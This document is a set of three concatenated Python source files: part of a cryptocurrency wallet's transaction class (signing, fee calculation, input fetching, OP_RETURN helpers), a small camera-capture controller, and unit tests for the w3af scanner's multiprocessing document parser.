are known (may consult self.fetched_inputs() to get a better idea of
possible input values). Will raise InputValueMissing if input values
are missing. '''
try:
return sum(x['value'] for x in (self.fetched_inputs() or self.inputs()))
except (KeyError, TypeError, ValueError) as e:
raise InputValueMissing from e
def output_value(self):
return sum(val for tp, addr, val in self.outputs())
def get_fee(self):
''' Try and calculate the fee based on the input data, and returns it as
satoshis (int). Can raise InputValueMissing on tx's where fee data is
missing, so client code should catch that. '''
# first, check if coinbase; coinbase tx always has 0 fee
if self.inputs() and self._inputs[0].get('type') == 'coinbase':
return 0
# otherwise just sum up all values - may raise InputValueMissing
return self.input_value() - self.output_value()
@profiler
def estimated_size(self):
'''Return an estimated tx size in bytes.'''
return (len(self.serialize(True)) // 2 if not self.is_complete() or self.raw is None
else len(self.raw) // 2) # ASCII hex string
@classmethod
def estimated_input_size(self, txin, sign_schnorr=False):
'''Return an estimated of serialized input size in bytes.'''
script = self.input_script(txin, True, sign_schnorr=sign_schnorr)
return len(self.serialize_input(txin, script, True)) // 2 # ASCII hex string
def signature_count(self):
r = 0
s = 0
for txin in self.inputs():
if txin['type'] == 'coinbase':
continue
signatures = list(filter(None, txin.get('signatures',[])))
s += len(signatures)
r += txin.get('num_sig', -1)
return s, r
def is_complete(self):
s, r = self.signature_count()
return r == s
@staticmethod
def verify_signature(pubkey, sig, msghash, reason=None):
''' Given a pubkey (bytes), signature (bytes -- without sighash byte),
and a sha256d message digest, returns True iff the signature is good
for the given public key, False otherwise. Does not raise normally
unless given bad or garbage arguments.
Optional arg 'reason' should be a list which will have a string pushed
at the front (failure reason) on False return. '''
if (any(not arg or not isinstance(arg, bytes) for arg in (pubkey, sig, msghash))
or len(msghash) != 32):
raise ValueError('bad arguments to verify_signature')
if len(sig) == 64:
# Schnorr signatures are always exactly 64 bytes
return schnorr.verify(pubkey, sig, msghash)
else:
from ecdsa import BadSignatureError, BadDigestError
from ecdsa.der import UnexpectedDER
# ECDSA signature
try:
pubkey_point = ser_to_point(pubkey)
vk = MyVerifyingKey.from_public_point(pubkey_point, curve=SECP256k1)
if vk.verify_digest(sig, msghash, sigdecode = ecdsa.util.sigdecode_der):
return True
except (AssertionError, ValueError, TypeError,
BadSignatureError, BadDigestError, UnexpectedDER) as e:
# ser_to_point will fail if pubkey is off-curve, infinity, or garbage.
# verify_digest may also raise BadDigestError and BadSignatureError
if isinstance(reason, list):
reason.insert(0, repr(e))
except BaseException as e:
print_error("[Transaction.verify_signature] unexpected exception", repr(e))
if isinstance(reason, list):
reason.insert(0, repr(e))
return False
@staticmethod
def _ecdsa_sign(sec, pre_hash):
pkey = regenerate_key(sec)
secexp = pkey.secret
private_key = MySigningKey.from_secret_exponent(secexp, curve = SECP256k1)
public_key = private_key.get_verifying_key()
sig = private_key.sign_digest_deterministic(pre_hash, hashfunc=hashlib.sha256, sigencode = ecdsa.util.sigencode_der)
assert public_key.verify_digest(sig, pre_hash, sigdecode = ecdsa.util.sigdecode_der)
return sig
@staticmethod
def _schnorr_sign(pubkey, sec, pre_hash):
pubkey = bytes.fromhex(pubkey)
sig = schnorr.sign(sec, pre_hash)
assert schnorr.verify(pubkey, sig, pre_hash) # verify what we just signed
return sig
def sign(self, keypairs, *, use_cache=False, anyonecanpay=False):
for i, txin in enumerate(self.inputs()):
pubkeys, x_pubkeys = self.get_sorted_pubkeys(txin)
for j, (pubkey, x_pubkey) in enumerate(zip(pubkeys, x_pubkeys)):
if self.is_txin_complete(txin):
# txin is complete
break
if pubkey in keypairs:
_pubkey = pubkey
kname = 'pubkey'
elif x_pubkey in keypairs:
_pubkey = x_pubkey
kname = 'x_pubkey'
else:
continue
print_error(f"adding signature for input#{i} sig#{j}; {kname}: {_pubkey} schnorr: {self._sign_schnorr}")
sec, compressed = keypairs.get(_pubkey)
self._sign_txin(i, j, sec, compressed, use_cache=use_cache, anyonecanpay=anyonecanpay)
print_error("is_complete", self.is_complete())
self.raw = self.serialize()
def _sign_txin(self, i, j, sec, compressed, *, use_cache=False, anyonecanpay=False):
'''Note: precondition is self._inputs is valid (ie: tx is already deserialized)'''
pubkey = public_key_from_private_key(sec, compressed)
# add signature
nHashType = 0x00000041 # hardcoded, perhaps should be taken from unsigned input dict
if anyonecanpay:
nHashType += 0x00000080
pre_hash = Hash(bfh(self.serialize_preimage(i, nHashType)))
if self._sign_schnorr:
sig = self._schnorr_sign(pubkey, sec, pre_hash)
else:
sig = self._ecdsa_sign(sec, pre_hash)
reason = []
if not self.verify_signature(bfh(pubkey), sig, pre_hash, reason=reason):
print_error(f"Signature verification failed for input#{i} sig#{j}, reason: {str(reason)}")
return None
txin = self._inputs[i]
txin['signatures'][j] = bh2u(sig + bytes((nHashType & 0xff,)))
txin['pubkeys'][j] = pubkey # needed for fd keys
return txin
def get_outputs(self):
"""convert pubkeys to addresses"""
o = []
for type, addr, v in self.outputs():
o.append((addr,v)) # consider using yield (addr, v)
return o
def get_output_addresses(self):
return [addr for addr, val in self.get_outputs()]
def has_address(self, addr):
return (addr in self.get_output_addresses()) or (addr in (tx.get("address") for tx in self.inputs()))
def is_final(self):
return not any([x.get('sequence', 0xffffffff - 1) < 0xffffffff - 1
for x in self.inputs()])
def as_dict(self):
if self.raw is None:
self.raw = self.serialize()
self.deserialize()
out = {
'hex': self.raw,
'complete': self.is_complete(),
'final': self.is_final(),
}
return out
# This cache stores foreign (non-wallet) tx's we fetched from the network
# for the purposes of the "fetch_input_data" mechanism. Its max size has
# been thoughtfully calibrated to provide a decent tradeoff between
# memory consumption and UX.
#
# In even aggressive/pathological cases this cache won't ever exceed
# 100MB even when full. [see ExpiringCache.size_bytes() to test it].
# This is acceptable considering this is Python + Qt and it eats memory
# anyway.. and also this is 2019 ;). Note that all tx's in this cache
# are in the non-deserialized state (hex encoded bytes only) as a memory
# savings optimization. Please maintain that invariant if you modify this
# code, otherwise the cache may grow to 10x memory consumption if you
# put deserialized tx's in here.
_fetched_tx_cache = ExpiringCache(maxlen=1000, name="TransactionFetchCache")
def fetch_input_data(self, wallet, done_callback=None, done_args=tuple(),
prog_callback=None, *, force=False, use_network=True):
'''
Fetch all input data and put it in the 'ephemeral' dictionary, under
'fetched_inputs'. This call potentially initiates fetching of
prevout_hash transactions from the network for all inputs to this tx.
The fetched data is basically used for the Transaction dialog to be able
to display fee, actual address, and amount (value) for tx inputs.
`wallet` should ideally have a network object, but this function still
will work and is still useful if it does not.
`done_callback` is called with `done_args` (only if True was returned),
upon completion. Note that done_callback won't be called if this function
returns False. Also note that done_callback runs in a non-main thread
context and as such, if you want to do GUI work from within it, use
the appropriate Qt signal/slot mechanism to dispatch work to the GUI.
`prog_callback`, if specified, is called periodically to indicate
progress after inputs are retrieved, and it is passed a single arg,
"percent" (eg: 5.1, 10.3, 26.3, 76.1, etc) to indicate percent progress.
Note 1: Results (fetched transactions) are cached, so subsequent
calls to this function for the same transaction are cheap.
Note 2: Multiple, rapid calls to this function will cause the previous
asynchronous fetch operation (if active) to be canceled and only the
latest call will result in the invocation of the done_callback if/when
it completes.
'''
if not self._inputs:
return False
if force:
# forced-run -- start with empty list
inps = []
else:
# may be a new list or list that was already in dict
inps = self.fetched_inputs(require_complete = True)
if len(self._inputs) == len(inps):
# we already have results, don't do anything.
return False
eph = self.ephemeral
eph['fetched_inputs'] = inps = inps.copy() # paranoia: in case another thread is running on this list
# Lazy imports to keep this functionality very self-contained
# These modules are always available so no need to globally import them.
import threading
import queue
import time
from copy import deepcopy
from collections import defaultdict
t0 = time.time()
t = None
cls = __class__
self_txid = self.txid()
def doIt():
'''
This function is seemingly complex, but it's really conceptually
simple:
1. Fetch all prevouts either from cache (wallet or global tx_cache)
2. Or, if they aren't in either cache, then we will asynchronously
queue the raw tx gets to the network in parallel, across *all*
our connected servers. This is very fast, and spreads the load
around.
Tested with a huge tx of 600+ inputs all coming from different
prevout_hashes on mainnet, and it's super fast:
cd8fcc8ad75267ff9ad314e770a66a9e871be7882b7c05a7e5271c46bfca98bc '''
last_prog = -9999.0
need_dl_txids = defaultdict(list) # the dict of txids we will need to download (wasn't in cache)
def prog(i, prog_total=100):
''' notify interested code about progress '''
nonlocal last_prog
if prog_callback:
prog = ((i+1)*100.0)/prog_total
if prog - last_prog > 5.0:
prog_callback(prog)
last_prog = prog
while eph.get('_fetch') == t and len(inps) < len(self._inputs):
i = len(inps)
inp = deepcopy(self._inputs[i])
typ, prevout_hash, n, addr, value = inp.get('type'), inp.get('prevout_hash'), inp.get('prevout_n'), inp.get('address'), inp.get('value')
if not prevout_hash or n is None:
raise RuntimeError('Missing prevout_hash and/or prevout_n')
if typ != 'coinbase' and (not isinstance(addr, Address) or value is None):
tx = cls.tx_cache_get(prevout_hash) or wallet.transactions.get(prevout_hash)
if tx:
# Tx was in cache or wallet.transactions, proceed
# note that the tx here should be in the "not
# deserialized" state
if tx.raw:
# Note we deserialize a *copy* of the tx so as to
# save memory. We do not want to deserialize the
# cached tx because if we do so, the cache will
# contain a deserialized tx which will take up
# several times the memory when deserialized due to
# Python's memory use being less efficient than the
# binary-only raw bytes. So if you modify this code
# do bear that in mind.
tx = Transaction(tx.raw)
try:
tx.deserialize()
# The below txid check is commented-out as
# we trust wallet tx's and the network
# tx's that fail this check are never
# put in cache anyway.
#txid = tx._txid(tx.raw)
#if txid != prevout_hash: # sanity check
# print_error("fetch_input_data: cached prevout_hash {} != tx.txid() {}, ignoring.".format(prevout_hash, txid))
except Exception as e:
print_error("fetch_input_data: WARNING failed to deserialize {}: {}".format(prevout_hash, repr(e)))
tx = None
else:
tx = None
print_error("fetch_input_data: WARNING cached tx lacked any 'raw' bytes for {}".format(prevout_hash))
# now, examine the deserialized tx, if it's still good
if tx:
if n < len(tx.outputs()):
outp = tx.outputs()[n]
addr, value = outp[1], outp[2]
inp['value'] = value
inp['address'] = addr
print_error("fetch_input_data: fetched cached", i, addr, value)
else:
print_error("fetch_input_data: ** FIXME ** should never happen -- n={} >= len(tx.outputs())={} for prevout {}".format(n, len(tx.outputs()), prevout_hash))
else:
# tx was not in cache or wallet.transactions, mark
# it for download below (this branch can also execute
# in the unlikely case where there was an error above)
need_dl_txids[prevout_hash].append((i, n)) # remember the input# as well as the prevout_n
inps.append(inp) # append either cached result or as-yet-incomplete copy of _inputs[i]
# Now, download the tx's we didn't find above if network is available
# and caller said it's ok to go out ot network.. otherwise just return
# what we have
if use_network and eph.get('_fetch') == t and wallet.network:
callback_funcs_to_cancel = set()
try: # the whole point of this try block is the `finally` way below...
prog(-1) # tell interested code that progress is now 0%
# Next, queue the transaction.get requests, spreading them
# out randomly over the connected interfaces
q = queue.Queue()
q_ct = 0
bad_txids = set()
def put_in_queue_and_cache(r):
''' we cache the results directly in the network callback
as even if the user cancels the operation, we would like
to save the returned tx in our cache, since we did the
work to retrieve it anyway. '''
q.put(r) # put the result in the queue no matter what it is
txid = ''
try:
# Below will raise if response was 'error' or
# otherwise invalid. Note: for performance reasons
# we don't validate the tx here or deserialize it as
# this function runs in the network thread and we
# don't want to eat up that thread's CPU time
# needlessly. Also note the cache doesn't store
# deserializd tx's so as to save memory. We
# always deserialize a copy when reading the cache.
tx = Transaction(r['result'])
txid = r['params'][0]
assert txid == cls._txid(tx.raw), "txid-is-sane-check" # protection against phony responses
cls.tx_cache_put(tx=tx, txid=txid) # save tx to cache here
except Exception as e:
# response was not valid, ignore (don't cache)
if txid: # txid may be '' if KeyError from r['result'] above
bad_txids.add(txid)
print_error("fetch_input_data: put_in_queue_and_cache fail for txid:", txid, repr(e))
for txid, l in need_dl_txids.items():
wallet.network.queue_request('blockchain.transaction.get', [txid],
interface='random',
callback=put_in_queue_and_cache)
callback_funcs_to_cancel.add(put_in_queue_and_cache)
q_ct += 1
def get_bh():
if eph.get('block_height'):
return False
lh = wallet.network.get_server_height() or wallet.get_local_height()
def got_tx_info(r):
q.put('block_height') # indicate to other thread we got the block_height reply from network
try:
confs = r.get('result').get('confirmations', 0) # will raise of error reply
if confs and lh:
# the whole point.. was to get this piece of data.. the block_height
eph['block_height'] = bh = lh - confs + 1
print_error('fetch_input_data: got tx block height', bh)
else:
print_error('fetch_input_data: tx block height could not be determined')
except Exception as e:
print_error('fetch_input_data: get_bh fail:', str(e), r)
if self_txid:
wallet.network.queue_request('blockchain.transaction.get', [self_txid,True],
interface=None, callback=got_tx_info)
callback_funcs_to_cancel.add(got_tx_info)
return True
if get_bh():
q_ct += 1
class ErrorResp(Exception):
pass
for i in range(q_ct):
# now, read the q back, with a 10 second timeout, and
# populate the inputs
try:
r = q.get(timeout=10)
if eph.get('_fetch') != t:
# early abort from func, canceled
break
if r == 'block_height':
# ignore block_height reply from network.. was already processed in other thread in got_tx_info above
continue
if r.get('error'):
msg = r.get('error')
if isinstance(msg, dict):
msg = msg.get('message') or 'unknown error'
raise ErrorResp(msg)
rawhex = r['result']
txid = r['params'][0]
assert txid not in bad_txids, "txid marked bad" # skip if was marked bad by our callback code
tx = Transaction(rawhex); tx.deserialize()
for item in need_dl_txids[txid]:
ii, n = item
assert n < len(tx.outputs())
outp = tx.outputs()[n]
addr, value = outp[1], outp[2]
inps[ii]['value'] = value
inps[ii]['address'] = addr
print_error("fetch_input_data: fetched from network", ii, addr, value)
prog(i, q_ct) # tell interested code of progress
except queue.Empty:
print_error("fetch_input_data: timed out after 10.0s fetching from network, giving up.")
break
except Exception as e:
print_error("fetch_input_data:", repr(e))
finally:
# force-cancel any extant requests -- this is especially
# crucial on error/timeout/failure.
for func in callback_funcs_to_cancel:
wallet.network.cancel_requests(func)
if len(inps) == len(self._inputs) and eph.get('_fetch') == t: # sanity check
eph.pop('_fetch', None) # potential race condition here, popping wrong t -- but in practice w/ CPython threading it won't matter
print_error(f"fetch_input_data: elapsed {(time.time()-t0):.4f} sec")
if done_callback:
done_callback(*done_args)
# /doIt
t = threading.Thread(target=doIt, daemon=True)
eph['_fetch'] = t
t.start()
return True
def fetched_inputs(self, *, require_complete=False):
''' Returns the complete list of asynchronously fetched inputs for
this tx, if they exist. If the list is not yet fully retrieved, and
require_complete == False, returns what it has so far
(the returned list will always be exactly equal to len(self._inputs),
with not-yet downloaded inputs coming from self._inputs and not
necessarily containing a good 'address' or 'value').
If the download failed completely or was never started, will return the
empty list [].
Note that some inputs may still lack key: 'value' if there was a network
error in retrieving them or if the download is still in progress.'''
if self._inputs:
ret = self.ephemeral.get('fetched_inputs') or []
diff = len(self._inputs) - len(ret)
if diff > 0 and self.ephemeral.get('_fetch') and not require_complete:
# in progress.. so return what we have so far
return ret + self._inputs[len(ret):]
elif diff == 0 and (not require_complete or not self.ephemeral.get('_fetch')):
# finished *or* in-progress and require_complete==False
return ret
return []
def fetch_cancel(self) -> bool:
''' Cancels the currently-active running fetch operation, if any '''
return bool(self.ephemeral.pop('_fetch', None))
@classmethod
def tx_cache_get(cls, txid : str) -> object:
''' Attempts to retrieve txid from the tx cache that this class
keeps in-memory. Returns None on failure. The returned tx is
not deserialized, and is a copy of the one in the cache. '''
tx = cls._fetched_tx_cache.get(txid)
if tx is not None and tx.raw:
# make sure to return a copy of the transaction from the cache
# so that if caller does .deserialize(), *his* instance will
# use up 10x memory consumption, and not the cached instance which
# should just be an undeserialized raw tx.
return Transaction(tx.raw)
return None
@classmethod
def tx_cache_put(cls, tx : object, txid : str = None):
''' Puts a non-deserialized copy of tx into the tx_cache. '''
if not tx or not tx.raw:
raise ValueError('Please pass a tx which has a valid .raw attribute!')
txid = txid or cls._txid(tx.raw) # optionally, caller can pass-in txid to save CPU time for hashing
cls._fetched_tx_cache.put(txid, Transaction(tx.raw))
def tx_from_str(txt):
"json or raw hexadecimal"
import json
txt = txt.strip()
if not txt:
raise ValueError("empty string")
try:
bfh(txt)
is_hex = True
except:
is_hex = False
if is_hex:
return txt
tx_dict = json.loads(str(txt))
assert "hex" in tx_dict.keys()
return tx_dict["hex"]
# ---
class OPReturn:
''' OPReturn helper namespace. Used by GUI main_window.py and also
electroncash/commands.py '''
class Error(Exception):
""" thrown when the OP_RETURN for a tx not of the right format """
class TooLarge(Error):
""" thrown when the OP_RETURN for a tx is >220 bytes """
@staticmethod
def output_for_stringdata(op_return):
from .i18n import _
if not isinstance(op_return, str):
raise OPReturn.Error('OP_RETURN parameter needs to be of type str!')
pushes = op_return.split('<push>')
script = "OP_RETURN"
for data in pushes:
if data.startswith("<hex>"):
data = data.replace("<hex>", "")
elif data.startswith("<empty>"):
pass
else:
data = data.encode('utf-8').hex()
script = script + " " + data
scriptBuffer = ScriptOutput.from_string(script)
if len(scriptBuffer.script) > 223:
raise OPReturn.TooLarge(_("OP_RETURN message too large, needs to be no longer than 220 bytes"))
amount = 0
return (TYPE_SCRIPT, scriptBuffer, amount)
@staticmethod
def output_for_rawhex(op_return):
from .i18n import _
if not isinstance(op_return, str):
raise OPReturn.Error('OP_RETURN parameter needs to be of type str!')
if op_return == 'empty':
op_return = ''
try:
op_return_script = b'\x6a' + bytes.fromhex(op_return.strip())
except ValueError:
raise OPReturn.Error(_('OP_RETURN script expected to be hexadecimal bytes'))
if len(op_return_script) > 223:
raise OPReturn.TooLarge(_("OP_RETURN script too large, needs to be no longer than 223 bytes"))
amount = 0
return (TYPE_SCRIPT, ScriptOutput.protocol_factory(op_return_script), amount)
# /OPReturn
|
camera.py
|
import gphoto2 as gp
import threading
import os
from os import listdir
from os.path import isfile, join
class CameraController:
def __init__(self, mypath):
print('init')
self._dir = mypath
self.pictures = sorted([os.path.join(mypath, f) for f in listdir(mypath) if isfile(join(mypath, f))])
def get_picture(self):
if 'capture_thread' in locals():
self.capture_thread.join()
self.capture_thread = threading.Thread(target=self._get_picture).start()
def _get_picture(self):
print('get picture')
camera = gp.check_result(gp.gp_camera_new())
gp.check_result(gp.gp_camera_init(camera))
print('Capturing image')
file_path = gp.check_result(gp.gp_camera_capture(
camera, gp.GP_CAPTURE_IMAGE))
print('Camera file path: {0}/{1}'.format(file_path.folder, file_path.name))
target = os.path.join(self._dir, file_path.name)
self.pictures.append(target)
print('Copying image to', target)
camera_file = gp.check_result(gp.gp_camera_file_get(
camera, file_path.folder, file_path.name, gp.GP_FILE_TYPE_NORMAL))
gp.check_result(gp.gp_file_save(camera_file, target))
gp.check_result(gp.gp_camera_exit(camera))
def wait_for_camera(self):
if 'capture_thread' in locals():
self.capture_thread.join()
def get_preview(self):
print('get preview')
|
test_mp_document_parser.py
|
"""
test_mp_document_parser.py
Copyright 2015 Andres Riancho
This file is part of w3af, http://w3af.org/ .
w3af is free software; you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation version 2 of the License.
w3af is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with w3af; if not, write to the Free Software
Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA
"""
import os
import time
import random
import unittest
import multiprocessing
from mock import patch, PropertyMock
from nose.plugins.skip import SkipTest
from concurrent.futures import TimeoutError
from w3af import ROOT_PATH
from w3af.core.data.parsers.doc.sgml import Tag
from w3af.core.data.parsers.mp_document_parser import MultiProcessingDocumentParser
from w3af.core.data.parsers.doc.url import URL
from w3af.core.data.url.HTTPResponse import HTTPResponse
from w3af.core.data.dc.headers import Headers
from w3af.core.data.parsers.doc.html import HTMLParser
from w3af.core.data.parsers.tests.test_document_parser import _build_http_response
class TestMPDocumentParser(unittest.TestCase):
def setUp(self):
self.url = URL('http://w3af.com')
self.headers = Headers([(u'content-type', u'text/html')])
self.mpdoc = MultiProcessingDocumentParser()
def tearDown(self):
self.mpdoc.stop_workers()
def test_basic(self):
resp = HTTPResponse(200, '<a href="/abc">hello</a>',
self.headers, self.url, self.url)
parser = self.mpdoc.get_document_parser_for(resp)
parsed_refs, _ = parser.get_references()
self.assertEqual([URL('http://w3af.com/abc')], parsed_refs)
def test_no_parser_for_images(self):
body = ''
url = URL('http://w3af.com/foo.jpg')
headers = Headers([(u'content-type', u'image/jpeg')])
resp = HTTPResponse(200, body, headers, url, url)
try:
self.mpdoc.get_document_parser_for(resp)
except Exception, e:
self.assertEqual(str(e), 'There is no parser for images.')
else:
self.assertTrue(False, 'Expected exception!')
def test_parser_timeout(self):
"""
Test to verify fix for https://github.com/andresriancho/w3af/issues/6723
"w3af running long time more than 24h"
"""
mmpdp = 'w3af.core.data.parsers.mp_document_parser.%s'
kmpdp = mmpdp % 'MultiProcessingDocumentParser.%s'
modp = 'w3af.core.data.parsers.document_parser.%s'
with patch(mmpdp % 'om.out') as om_mock,\
patch(kmpdp % 'PARSER_TIMEOUT', new_callable=PropertyMock) as timeout_mock,\
patch(kmpdp % 'MAX_WORKERS', new_callable=PropertyMock) as max_workers_mock,\
patch(modp % 'DocumentParser.PARSERS', new_callable=PropertyMock) as parsers_mock:
#
# Test the timeout
#
html = '<html>DelayedParser!</html>'
http_resp = _build_http_response(html, u'text/html')
timeout_mock.return_value = 1
max_workers_mock.return_value = 1
parsers_mock.return_value = [DelayedParser, HTMLParser]
try:
self.mpdoc.get_document_parser_for(http_resp)
except TimeoutError, toe:
self._is_timeout_exception_message(toe, om_mock, http_resp)
else:
self.assertTrue(False)
#
# We now want to make sure that after we kill the process the Pool
# creates a new process for handling our tasks
#
# https://github.com/andresriancho/w3af/issues/9713
#
html = '<html>foo-</html>'
http_resp = _build_http_response(html, u'text/html')
doc_parser = self.mpdoc.get_document_parser_for(http_resp)
self.assertIsInstance(doc_parser._parser, HTMLParser)
def test_many_parsers_timing_out(self):
"""
Received more reports of parsers timing out, and after that
w3af showing always "The parser took more than X seconds to complete
parsing of" for all calls to the parser.
Want to test how well the the parser recovers from many timeouts.
"""
mmpdp = 'w3af.core.data.parsers.mp_document_parser.%s'
kmpdp = mmpdp % 'MultiProcessingDocumentParser.%s'
modp = 'w3af.core.data.parsers.document_parser.%s'
with patch(mmpdp % 'om.out') as om_mock,\
patch(kmpdp % 'PARSER_TIMEOUT', new_callable=PropertyMock) as timeout_mock,\
patch(kmpdp % 'MAX_WORKERS', new_callable=PropertyMock) as max_workers_mock,\
patch(modp % 'DocumentParser.PARSERS', new_callable=PropertyMock) as parsers_mock:
# Prepare the HTTP responses
html_trigger_delay = '<html>DelayedParser!</html>%s'
html_ok = '<html>foo-</html>%s'
# Mocks
timeout_mock.return_value = 1
max_workers_mock.return_value = 5
parsers_mock.return_value = [DelayedParser, HTMLParser]
ITERATIONS = 25
#
# Lets timeout many sequentially
#
for i in xrange(ITERATIONS):
http_resp = _build_http_response(html_trigger_delay % i, u'text/html')
try:
self.mpdoc.get_document_parser_for(http_resp)
except TimeoutError, toe:
self._is_timeout_exception_message(toe, om_mock, http_resp)
else:
self.assertTrue(False)
#
# Lets timeout randomly
#
for i in xrange(ITERATIONS):
html = random.choice([html_trigger_delay, html_ok])
http_resp = _build_http_response(html % i, u'text/html')
try:
parser = self.mpdoc.get_document_parser_for(http_resp)
except TimeoutError, toe:
self._is_timeout_exception_message(toe, om_mock, http_resp)
else:
self.assertIsInstance(parser._parser, HTMLParser)
#
# Lets parse things we know should work
#
for i in xrange(ITERATIONS):
http_resp = _build_http_response(html_ok % i, u'text/html')
parser = self.mpdoc.get_document_parser_for(http_resp)
self.assertIsInstance(parser._parser, HTMLParser)
def test_parser_with_large_attr_killed_when_sending_to_queue(self):
"""
https://docs.python.org/2/library/multiprocessing.html
Warning If a process is killed using Process.terminate()
or os.kill() while it is trying to use a Queue, then the
data in the queue is likely to become corrupted. This may
cause any other process to get an exception when it tries
to use the queue later on.
Try to kill the process while it is sending data to the queue
"""
raise SkipTest('This test breaks the build because it uses A LOT'
' of memory, for more information take a look at'
' https://circleci.com/gh/andresriancho/w3af/2819 .'
' Note that there is no memory leak here, just a'
' test which is designed to use a lot of memory'
' to force a specific state.')
mmpdp = 'w3af.core.data.parsers.mp_document_parser.%s'
kmpdp = mmpdp % 'MultiProcessingDocumentParser.%s'
modp = 'w3af.core.data.parsers.document_parser.%s'
with patch(mmpdp % 'om.out') as om_mock,\
patch(kmpdp % 'PARSER_TIMEOUT', new_callable=PropertyMock) as timeout_mock,\
patch(kmpdp % 'MAX_WORKERS', new_callable=PropertyMock) as max_workers_mock,\
patch(modp % 'DocumentParser.PARSERS', new_callable=PropertyMock) as parsers_mock:
# Prepare the HTTP responses
html_trigger_delay = '<html>HugeClassAttrValueParser!</html>%s'
html_ok = '<html>foo-</html>%s'
# Mocks
timeout_mock.return_value = 1
max_workers_mock.return_value = 5
parsers_mock.return_value = [HugeClassAttrValueParser, HTMLParser]
ITERATIONS = 10
#
# Lets timeout many sequentially
#
for i in xrange(ITERATIONS):
http_resp = _build_http_response(html_trigger_delay % i, u'text/html')
try:
self.mpdoc.get_document_parser_for(http_resp)
except TimeoutError, toe:
self._is_timeout_exception_message(toe, om_mock, http_resp)
else:
self.assertTrue(False)
#
# Lets timeout randomly
#
for i in xrange(ITERATIONS):
html = random.choice([html_trigger_delay, html_ok])
http_resp = _build_http_response(html % i, u'text/html')
try:
parser = self.mpdoc.get_document_parser_for(http_resp)
except TimeoutError, toe:
self._is_timeout_exception_message(toe, om_mock, http_resp)
else:
self.assertIsInstance(parser._parser, HTMLParser)
#
# Lets parse things we know should work
#
for i in xrange(ITERATIONS):
http_resp = _build_http_response(html_ok % i, u'text/html')
parser = self.mpdoc.get_document_parser_for(http_resp)
self.assertIsInstance(parser._parser, HTMLParser)
def test_parser_memory_usage_exceeded(self):
"""
This makes sure that we stop parsing a document that exceeds our memory
usage limits.
"""
mmpdp = 'w3af.core.data.parsers.mp_document_parser.%s'
kmpdp = mmpdp % 'MultiProcessingDocumentParser.%s'
modp = 'w3af.core.data.parsers.document_parser.%s'
with patch(mmpdp % 'om.out') as om_mock,\
patch(kmpdp % 'MEMORY_LIMIT', new_callable=PropertyMock) as memory_mock,\
patch(kmpdp % 'MAX_WORKERS', new_callable=PropertyMock) as max_workers_mock,\
patch(modp % 'DocumentParser.PARSERS', new_callable=PropertyMock) as parsers_mock:
#
# Test the memory usage
#
html = '<html>UseMemoryParser!</html>'
http_resp = _build_http_response(html, u'text/html')
memory_mock.return_value = 150000
max_workers_mock.return_value = 1
parsers_mock.return_value = [UseMemoryParser, HTMLParser]
try:
self.mpdoc.get_document_parser_for(http_resp)
except MemoryError, me:
self.assertIn('OOM issues', str(me))
else:
self.assertTrue(False)
#
# We now want to make sure that after we stop because of a memory issue
# the process the Pool continues handling tasks as expected
#
html = '<html>foo-</html>'
http_resp = _build_http_response(html, u'text/html')
doc_parser = self.mpdoc.get_document_parser_for(http_resp)
self.assertIsInstance(doc_parser._parser, HTMLParser)
def _is_timeout_exception_message(self, toe, om_mock, http_resp):
msg = ('[timeout] The parser took more than %s seconds to '
'complete parsing of "%s", killed it!')
error = msg % (MultiProcessingDocumentParser.PARSER_TIMEOUT,
http_resp.get_url())
self.assertEquals(str(toe), error)
def test_daemon_child(self):
"""
Reproduces:
A "AssertionError" exception was found while running
crawl.web_spider on "Method: GET | http://domain:8000/". The
exception was: "daemonic processes are not allowed to have children"
at process.py:start():124. The scan will continue but some
vulnerabilities might not be identified.
"""
queue = multiprocessing.Queue()
p = multiprocessing.Process(target=daemon_child, args=(queue,))
p.daemon = True
p.start()
p.join()
got_assertion_error = queue.get(timeout=10)
if got_assertion_error:
self.assertTrue(False, 'daemonic processes are not allowed'
' to have children')
def test_non_daemon_child_ok(self):
"""
Making sure that the previous failure is due to "p.daemon = True"
"""
queue = multiprocessing.Queue()
p = multiprocessing.Process(target=daemon_child, args=(queue,))
# This is where we change stuff:
#p.daemon = True
p.start()
p.join()
got_assertion_error = queue.get(timeout=10)
if got_assertion_error:
self.assertTrue(False, 'daemonic processes are not allowed'
' to have children')
def test_dictproxy_pickle_8748(self):
"""
MaybeEncodingError - PicklingError: Can't pickle dictproxy #8748
https://github.com/andresriancho/w3af/issues/8748
"""
html_body = os.path.join(ROOT_PATH, '/core/data/parsers/tests/data/',
'pickle-8748.htm')
url = URL('http://www.ensinosuperior.org.br/asesi.htm')
resp = HTTPResponse(200, html_body, self.headers, url, url)
parser = self.mpdoc.get_document_parser_for(resp)
self.assertIsInstance(parser._parser, HTMLParser)
def test_get_tags_by_filter(self):
body = '<html><a href="/abc">foo</a><b>bar</b></html>'
url = URL('http://www.w3af.com/')
headers = Headers()
headers['content-type'] = 'text/html'
resp = HTTPResponse(200, body, headers, url, url, charset='utf-8')
tags = self.mpdoc.get_tags_by_filter(resp, ('a', 'b'), yield_text=True)
self.assertEqual([Tag('a', {'href': '/abc'}, 'foo'),
Tag('b', {}, 'bar')], tags)
def test_get_tags_by_filter_empty_tag(self):
body = '<html><script src="foo.js"></script></html>'
url = URL('http://www.w3af.com/')
headers = Headers()
headers['content-type'] = 'text/html'
resp = HTTPResponse(200, body, headers, url, url, charset='utf-8')
tags = self.mpdoc.get_tags_by_filter(resp, ('script',), yield_text=True)
# Note that lxml returns None for this tag text:
self.assertEqual([Tag('script', {'src': 'foo.js'}, None)], tags)
def daemon_child(queue):
dpc = MultiProcessingDocumentParser()
try:
dpc.start_workers()
except AssertionError:
queue.put(True)
else:
queue.put(False)
class DelayedParser(object):
def __init__(self, http_response):
self.http_response = http_response
@staticmethod
def can_parse(http_response):
return 'DelayedParser' in http_response.get_body()
def parse(self):
time.sleep(3)
def clear(self):
return True
class UseMemoryParser(object):
def __init__(self, http_response):
self.http_response = http_response
@staticmethod
def can_parse(http_response):
return 'UseMemoryParser' in http_response.get_body()
def parse(self):
memory_user = ''
for _ in xrange(1000000):
memory_user += 'A' * 256
def clear(self):
return True
class HugeClassAttrValueParser(object):
parse_was_called = False
def __init__(self, http_response):
self.data_to_make_queue_busy = None
self.http_response = http_response
@staticmethod
